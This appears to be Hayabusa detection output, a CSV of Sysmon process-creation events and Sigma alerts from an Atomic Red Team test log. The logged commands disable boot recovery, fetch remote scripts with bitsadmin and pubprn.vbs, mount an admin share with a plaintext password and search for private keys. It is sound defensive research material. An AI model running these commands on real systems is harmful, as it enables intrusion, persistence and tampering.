+09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry 
Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 
747F3D96-D81D-5D31-0000-0010B8CA2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 747F3D96-D824-5D31-0000-001023F42B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 
747F3D96-D824-5D31-0000-001075F62B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D83E-5D31-0000-0010F0D02E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 747F3D96-D83E-5D31-0000-001042D32E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via 
BITS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 747F3D96-D83E-5D31-0000-001046E52E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete 
AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 747F3D96-D83F-5D31-0000-0010A2E72E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 747F3D96-D83F-5D31-0000-00105EF22E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b 
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D844-5D31-0000-0010C70A2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 
747F3D96-D845-5D31-0000-001098212F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 747F3D96-D849-5D31-0000-0010914D2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 
/u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D84E-5D31-0000-00102C702F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in 
CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private 
Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 747F3D96-D87B-5D31-0000-0010D92D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 
747F3D96-D87C-5D31-0000-0010E83B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D87C-5D31-0000-00107A403100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 
747F3D96-D87C-5D31-0000-0010CC423100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | 